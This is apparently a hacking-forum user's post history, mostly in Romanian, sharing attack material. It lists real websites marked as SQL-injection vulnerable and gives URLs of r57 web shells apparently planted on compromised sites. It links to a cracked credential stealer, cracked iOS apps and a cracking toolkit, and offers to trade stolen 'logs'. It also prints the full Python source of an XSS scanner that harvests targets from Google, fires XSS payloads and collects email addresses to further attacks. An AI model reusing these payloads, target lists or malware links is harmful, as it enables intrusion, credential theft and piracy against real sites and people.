-
Posts
984 -
Joined
-
Last visited
-
Days Won
10
Everything posted by Jimmy
-
Depinde, sunt unii care se axeaza pe un anumit limbaj si altii (ca mine) cate putin din fiecare...
-
Asa l-am gasit...deja scanat
-
Megaupload http://my-avscan.com/result
-
Scaneaza dupa erori de gen (Rfi,Lfi,SqL ...)
-
Am si eu nevoie de un cont...dau loguri la schimb
-
Netestat Download Sursa: Bug Scanner
-
Download Scanresult
-
A Penetration Attack Reconstructed A Quick and Dirty Intro to Nessus using the Auditor Boot CD! Adding Modules to a Slax or Backtrack Live CD from Windows Airplay replay attack – no wireless client required Anonym.OS LiveCD with build in Tor Onion routing and Privoxy BackTrack LiveCD to HD Installation Instruction Video Basic Nmap Usage! Basic Tools for Wardriving! Bluesnarfer attack tool demonstration Bluesnarfing a Nokia 6310i hand set Breaking WEP in 10 minutes Cain to ARP poison and sniff passwords! Complete Hacking Video using Metasploit – Meterpreter Cracking a 128 bit WEP key (Auditor) Cracking a 128 Bit Wep key + entering the cridentials Cracking Syskey and the SAM on Windows Using Samdump2 and John! Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text! Cracking WPA Networks (Auditor) DoS attack against Windows FTP Server – DoS Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools! Exploiting some bugs of tools used in Windows Exploiting weaknesses of PPTP VPN (Auditor) Finding Rogue SMB File Shares On Your Network! Fun with Ettercap Filters! How to crack the local windows passwords in the SAM database How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor) How to sniff around switches using Arpspoof and Ngrep! Install VNC Remotely! Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res) Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res) John The Ripper 1.7 password cracker Installation Instruction Video Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005! MAC Bridging with Windows XP and Sniffing! Mass De-Authentication using void11 (Auditor) Metasploit Flash Tutorial! MITM Hijacking Nmap Video Tutorial 2 Port Scan Boogaloo! Sniffing logins and passwords Sniffing Remote Router Traffic via GRE Tunnels (Hi-Res) Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res) Sniffing VoIP Using Cain! Snort Instruction video – howto install into backtrack SSH Dynamic Port Forwarding! Start a session and get interactive commandline access to a remote Windows box! Telnet Bruteforce Tunneling Exploits through SSH Use Brutus to crack a box running telnet! Using NetworkActiv to sniff webpages on a Wi-Fi network! WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0) WMF File Code Execution Vulnerability With Metasploit! WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0) Hotfile.com: Transfer de fisiere cu 1 singur click: Network A? Hack.part1.rar Hotfile.com: Transfer de fisiere cu 1 singur click: Network A? Hack.part2.rar Hotfile.com: Transfer de fisiere cu 1 singur click: Network A? Hack.part3.rar Hotfile.com: Transfer de fisiere cu 1 singur click: Network A? Hack.part4.rar Hotfile.com: Transfer de fisiere cu 1 singur click: Network A? Hack.part5.rar Hotfile.com: Transfer de fisiere cu 1 singur click: Network A? Hack.part6.rar Hotfile.com: Transfer de fisiere cu 1 singur click: Network A? Hack.part7.rar
-
Un pack tools pentru crackeri: OllyDbg 1.10 & Plugins - Modified by SLV *NEW* W32Dasm 8.93 - Patched *NEW* PEiD 0.93 + Plugins *NEW* RDG Packer Detector v0.5.6 Beta - English *NEW* Rebuilding : ImpRec 1.6 - Fixed by MaRKuS_TH-DJM/SnD *NEW* Revirgin 1.5 - Fixed *NEW* LordPE De Luxe B *NEW* Packers : FSG 2.0 MEW 11 1.2 SE UPX 1.25 & GUI *NEW* SLVc0deProtector 0.61 *NEW* ARM Protector v0.3 *NEW* WinUpack v0.31 Beta *NEW* Patchers : dUP 2 *NEW* CodeFusion 3.0 Universal Patcher Pro v2.0 Universal Patcher v1.7 *NEW* Universal Loader Creator v1.2 *NEW* aPatch v1.07 PMaker v1.2.0.0 *NEW* Tola's Patch Engine v2.03b ABEL Loader v2.31 Yoda's Process Patcher *NEW* Registry Patch Creator *NEW* ScAEvoLa's PatchEngine v1.33 *NEW* Dogbert's Genuine Patching Engine v1.41 *NEW* Graphical-PatchMaker v1.4 *NEW* The aPE v0.0.7 BETA *NEW* Liquid2 *NEW* PELG v0.3 *NEW* PrincessSandy v1.0 *NEW* HEX Editor : Biew v5.6.2 Hiew v7.10 *NEW* WinHex v12.5 *NEW* Decompilers : DeDe 3.50.04 VB ***8217;Decompiler***8217; Lite v0.4 *NEW* Flasm Unpackers : ACProtect - ACStripper ASPack - ASPackDie ASProtect > Stripper 2.07 Final & Stripper 2.11 RC2 *NEW* DBPE > UnDBPE FSG 1.33 > Pumqara's Dumper FSG 2.00 > UnFSG MEW > UnMEW PeCompact 1.x > UnPecomp PEncrypt > UnPEncrypt PeSpin 0.3 > DeSpinner 0.3 tELock 0.98-1.0 > UntELock EXEStealth > UnStealth Xtreme-Protector / Themida > XprotStripper v1.1 *NEW* Morphine Killer 1.1 by SuperCracker/SND *NEW* ASPR Dumper v0.1 *NEW* Armadillo Process Detach v1.1 *NEW* Armadillo Dumper v1.0 *NEW* Armadillo Nanomite Fixer *NEW* Armadillo Distance Decryptor aka Jump Table Fixer *NEW* ArmTools (Translated!) *NEW* ArmInline v0.1 *NEW* Quick Unpack v1.0b3 *NEW* Procdump v1.6.2 *NEW* Keygenning : *NEW* TMG Ripper Studio 0.02 *NEW* Other : FileMon v7 (Patched) *NEW* RegMon v7 (Patched) *NEW* RSATool 2 DAMN HashCalc EVACleaner 2.7 Process Explorer Resource Hacker PUPE 2002 PointH Locator *NEW* ASPR CRC Locator 1.2 *NEW* PE Tools 1.5 RC5 *NEW* API Address Finder *NEW* Jump to Hex Convertor *NEW* PE GeNeRaToR 1.2.1 *NEW* Quick File Viewer v1.0.1 *NEW* PE Insight 0.3b *NEW* Crypto Searcher *NEW* PE Editor v1.7 *NEW* bkslash's Inline Patcher *NEW* Stud_PE v2.1 *NEW* Injecta v0.2 *NEW* PE Rebuilder v0.96b *NEW* PE Optimizer v1.4 *NEW* ToPo v1.2 *NEW* NFO Builder 2000 v1.02 *NEW* NFO File Maker v1.6 *NEW* TMG NFOmakeR v1.0 *NEW* hCalc *NEW* Download Rar pass: www.cw-network.info
-
Download http://virusscan.jotti.org/es/scanresult Rar pass: 3K7KgK+I88/o2OP6 GILA7---->HAZZ-15
-
nu e bun link Acum e bun
-
Download http://virusscan.jotti.org/es/scanresult
-
Titlul spune tot. MEGAUPLOAD - The leading online storage and file delivery service VirusTotal_report
-
http://www.kameros.com/index.php?id=1' : SQLi Vulnerable http://www.societatedurabila.ro/index.php?id=37' : SQLi Vulnerable http://www.citatepedia.ro/index.php?id=25165' : SQLi Vulnerable http://www.agencevu.com/stories/index.php?id=520&p=46' : SQLi Vulnerable http://proiecte.nipne.ro/ceex/index.php?id=43' : SQLi Vulnerable http://www.focus-fen.net/index.php?id=n191696' : SQLi Vulnerable http://www.citatepedia.ro/index.php?id=13354' : SQLi Vulnerable http://rommed2000.ro/ro/index.php?id=10020' : SQLi Vulnerable http://tigle-ceramice.ro/index.php?id=43' : SQLi Vulnerable http://www.spartan.ro/index.php?id=212' : SQLi Vulnerable http://www.keepmovieng.com/ro/index.php?id=10?=pagini&cat=linkuri' : SQLi Vulnerable http://www.cn-caragiale.ro/index.php?id=28' : SQLi Vulnerable http://proiecte.nipne.ro/pn2/index.php?id=123' : SQLi Vulnerable http://www.citatepedia.ro/index.php?id=19962' : SQLi Vulnerable http://www.societatedurabila.ro/index.php?id=4' : SQLi Vulnerable http://webtoplist.3x.ro/index.php?id=35' : SQLi Vulnerable http://www.focus-fen.net/index.php?id=n248243' : SQLi Vulnerable http://www.sibiuvirtual.ro/_TOURS/index.php?id=5' : SQLi Vulnerable http://www.spartan.ro/index.php?id=9' : SQLi Vulnerable http://proiecte.nipne.ro/pn2/index.php?id=19' : SQLi Vulnerable http://proiecte.nipne.ro/pn2/index.php?id=15' : SQLi Vulnerable http://www.societatedurabila.ro/index.php?id=8' : SQLi Vulnerable http://www.mcmbasket.ro/index.php?page=stirea?=en&id=464' : SQLi Vulnerable http://www.click-uri.ro/vot/index.php?id=6238' : SQLi Vulnerable http://www.mcmbasket.ro/index.php?page=stirea?=en&id=464' : SQLi Vulnerable r57 shells http://www.modelkalip.com/admin/data/images/r57.php http://users.silenceisdefeat.net/amishb/r57.php http://annetpp.by.ru/r57.php http://makhoof.by.ru/r57.php http://devast.by.ru/r57.php http://hostfile.org/r57.php http://www.h-alqaem.com/md/components/r57.php http://nguyenthiminhphuong.free.fr/SOFTWARES/r57.php http://x-rayproject.org/gallery/admin/c9916-1.php?act=f&f=r57.php&d=E%3A%5Cinetpub%5Cvhosts%5CX-RAYPROJECT.ORG%5Chttpdocs%5Cgallery%5Cadmin& http://x-rayproject.org/gallery/admin/xo.php?act=f&f=r57.php&d=E%3A%5Cinetpub%5Cvhosts%5CX-RAYPROJECT.ORG%5Chttpdocs%5Cgallery%5Cadmin&
-
The 2011 Best packs of IPAD - IPHONE Game & AppsEnglish | The 2011 Best packs of IPAD - IPHONE Game & Apps | 2.47 GB The Most populer (cracked) Ipad - Iphone Game and Apps until 22 April 2011 Your Ipad must be jailbreaked first.. List: Aralon HD-v3.4 Book.of.magic.v2 Dungeon.Defenders.First.Wave-v5.0 Eternal.Legacy.HD-v1.0.0 Google Books-v1.1.0.2247 Google Earth-v3.2 Introduction A-v2.0 Knights Aliens Prophetic LittleStar-v1.0 Mercury-v4.3.1 Notes Plus-v2.3 Papers-v1.9.5 Photo Cookbook-v19 Piano C.-v1.1 RSSPlayer-v2.3.0- SelfClassics-v4.0 Super Kamasutra HD-v1.1 World_History WorldConquest APPS 2011.part1.rar APPS 2011.part2.rar APPS 2011.part3.rar APPS 2011.part4.rar APPS 2011.part5.rar APPS 2011.part6.rar
-
#!/usr/bin/python #XSS Scanner that can find hosts using a google query or search one site. #If XSS is found it attempts to collect email addresses to further your attack #or warn the target of the flaw. When the scan is complete #it will print out the XSS's found and or write to file, it will find false positives #so manually check before getting to excited. It also has verbose mode and #you can change the alert pop-up message, check options!! # ##Changelog v1.1: added options, verbose, write to file, change alert #Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback #Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed #some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt) # #d3hydr8[at]gmail[dot]com import sys, urllib2, re, sets, random, httplib, time, socket def title(): print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.3" print "\t-----------------------------------------------" def usage(): title() print "\n Usage: python XSSscan.py <option>\n" print "\n Example: python XSSscan.py -g inurl:'.gov' 200 -a 'XSS h4ck3d' -write xxs_found.txt -v\n" print "\t[options]" print "\t -g/-google <query> <num of hosts> : Searches google for hosts" print "\t -s/-site <website> <port>: Searches just that site, (default port 80)" print "\t -a/-alert <alert message> : Change the alert pop-up message" print "\t -w/-write <file> : Writes potential XSS found to file" print "\t -v/-verbose : Verbose Mode\n" def StripTags(text): finished = 0 while not finished: finished = 1 start = text.find("<") if start >= 0: stop = text[start:].find(">") if stop >= 0: text = text[:start] + text[start+stop+1:] finished = 0 return text def timer(): now = time.localtime(time.time()) return time.asctime(now) def geturls(query): counter = 10 urls = [] while counter < int(sys.argv[3]): url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N' opener = urllib2.build_opener(url) opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')] data = opener.open(url).read() hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data)) #Lets add sites found to a list if not already or a google site. #We don't want to upset the people that got our list for us. for x in hosts: if x.find('www') != -1: x = x[x.find('www'):] if x not in urls and re.search("google", x) == None: urls.append(x) counter += 10 return urls def getemails(site): try: if site.split("/",1)[0] not in done: print "\t[+] Collecting Emails:",site.split("/",1)[0] webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read() emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage) done.append(site.split("/",1)[0]) if emails: return emails except(KeyboardInterrupt): print "\n[-] Cancelled -",timer(),"\n" sys.exit(1) except(IndexError): pass def getvar(site): names = [] actions = [] print "\n","-"*45 print "[+] Searching:",site try: webpage = urllib2.urlopen(proto+"://"+site, port).read() emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage) var = re.findall("\?[\w\.\-/]*\=",webpage) if len(var) >=1: var = list(sets.Set(var)) found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower()) found_action = list(sets.Set(found_action)) if len(found_action) >= 1: for a in found_action: a = a.split('"',2)[1] try: if a[0] != "/": a = "/"+a except(IndexError): pass actions.append(a) found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower()) found_names = list(sets.Set(found_names)) for n in found_names: names.append(n.split('"',2)[1]) print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names) print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*len(xss_payloads) if len(var) >= 1: for v in var: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+"/"+v+xss) for xss in xss_payloads: tester(site+"/"+v+xss) if len(names) >= 1: for n in names: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss) for xss in xss_payloads: tester(site+"/"+"?"+n+"="+xss) if len(actions) != 0 and len(names) >= 1: for a in actions: for n in names: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss) #tester(site.split("/")[0]+a+"?"+n+"="+xss) if len(actions) != 0 and len(var) >= 1: for a in actions: for v in var: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+a+v+xss) else: for xss in xss_payloads: tester(site.split("/")[0]+a+v+xss) if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": urls.remove(site) except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror): if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": urls.remove(site) pass except(KeyboardInterrupt): print "\n[-] Cancelled -",timer(),"\n" sys.exit(1) def tester(target): if verbose ==1: if message != "": print "Target:",target.replace(alert ,message) else: print "Target:",target try: source = urllib2.urlopen(proto+"://"+target, port).read() h = httplib.HTTPConnection(target.split('/')[0], int(port)) try: h.request("GET", "/"+target.split('/',1)[1]) except(IndexError): h.request("GET", "/") r1 = h.getresponse() if verbose ==1: print "\t[+] Response:",r1.status, r1.reason if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418): if target not in found_xss: if message != "": print "\n[!] XSS:", target.replace(alert ,message) else: print "\n[!] XSS:", target print "\t[+] Response:",r1.status, r1.reason emails = getemails(target) if emails: print "\t[+] Email:",len(emails),"addresses\n" found_xss.setdefault(target, list(sets.Set(emails))) else: found_xss[target] = "None" except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL): pass except(KeyboardInterrupt): print "\n[-] Cancelled -",timer(),"\n" sys.exit(1) except(): pass if len(sys.argv) <= 2: usage() sys.exit(1) for arg in sys.argv[1:]: if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1 if arg.lower() == "-w" or arg.lower() == "-write": txt = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-a" or arg.lower() == "-alert": message = re.sub("\s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2]) title() socket.setdefaulttimeout(3) found_xss = {} done = [] count = 0 proto = "http" alert = "D3HYDR8%2D0wNz%2DY0U" print "\n[+] XSS_scan Loaded" try: if verbose ==1: print "[+] Verbose Mode On" except(NameError): verbose = 0 print "[-] Verbose Mode Off" try: if message: print "[+] Alert:",message except(NameError): print "[+] Alert:",alert message = "" pass xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E", "%22%3E<IMG SRC=\"javascript:alert(%27"+alert+"%27);\">", "%22%3E<script>alert(String.fromCharCode(68,51,72,89,68,82,56,45,48,119,78,122,45,89,48,85));</script>", "'';!--\"<%27"+alert+"%27>=&{()}", "';alert(0)//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function", "</textarea><script>alert(%27"+alert+"%27)</script>"] try: if txt: print "[+] File:",txt except(NameError): txt = None pass print "[+] XSS Payloads:",len(xss_payloads) if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": try: if sys.argv[3].isdigit() == False: print "\n[-] Argument [",sys.argv[3],"] must be a number.\n" sys.exit(1) else: if int(sys.argv[3]) <= 10: print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n" sys.exit(1) except(IndexError): print "\n[-] Need number of hosts to collect.\n" sys.exit(1) query = re.sub("\s","+",sys.argv[2]) port = "80" print "[+] Query:",query print "[+] Querying Google..." urls = geturls(query) print "[+] Collected:",len(urls),"hosts" print "[+] Started:",timer() print "\n[-] Cancel: Press Ctrl-C" time.sleep(3) while len(urls) > 0: print "-"*45 print "\n[-] Length:",len(urls),"remain" getvar(random.choice(urls)) if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site": site = sys.argv[2] try: if sys.argv[3].isdigit() == False: port = "80" else: port = sys.argv[3] except(IndexError): port = "80" print "[+] Site:",site print "[+] Port:",port if site[:7] == "http://": site = site.replace("http://","") if site[:8] == "https://": proto = "https" if port == "80": print "[!] Using port 80 with https? (443)" site = site.replace("https://","") print "[+] Started:",timer() print "\n[-] Cancel: Press Ctrl-C" time.sleep(4) getvar(site) print "-"*65 print "\n\n[+] Potential XSS found:",len(found_xss),"\n" time.sleep(3) if txt != None and len(found_xss) >=1: xss_file = open(txt, "a") xss_file.writelines("\n\td3hydr8[at]gmail[dot]com XSS Scanner v1.3\n") xss_file.writelines("\t------------------------------------------\n\n") print "[+] Writing Data:",txt else: print "[-] No data written to disk" for k in found_xss.keys(): count+=1 if txt != None: if message != "": xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"\n") else: xss_file.writelines("["+str(count)+"] "+k+"\n") if message != "": print "\n["+str(count)+"]",k.replace(alert ,message) else: print "\n["+str(count)+"]",k addrs = found_xss[k] if addrs != "None": print "\t[+] Email addresses:" for addr in addrs: if txt != None: xss_file.writelines("\tEmail: "+addr+"\n") print "\t -",addr print "\n[-] Done -",timer(),"\n" Domxssscanner
-
Download: Download File - virulent-cracker-v_1_zip - VipraSys File Hosting
-
Info: Secure-Soft.cc Download: http://www.opensc.ws/attachments/trojan-malware-samples/5250d1305895608-secure-soft-lol-stealer-5-10-cracked-secure-soft_stealer_5.10_cracked.zip http://www.opensc.ws/attachments/trojan-malware-samples/5253d1305905062-secure-soft-lol-stealer-5-10-cracked-secure-soft_stealer_5.10-cracked_updated.zip http://www.opensc.ws/attachments/trojan-malware-samples/5254d1305905062-secure-soft-lol-stealer-5-10-cracked-ocz_dll_update.zip
-
Nici eu , si multi nu au vb serios si au glumit cu tine...insa tu te enervezi ne fwti pe toti la cap pana cand i se mai pune pata la unu ,iti mai baga o pwla lasanduse cu ban (cea ce urmatesti u...cred)
-
Cu toate ca e criza ma lipsesc...
-
89123 pentru cine lucrezi?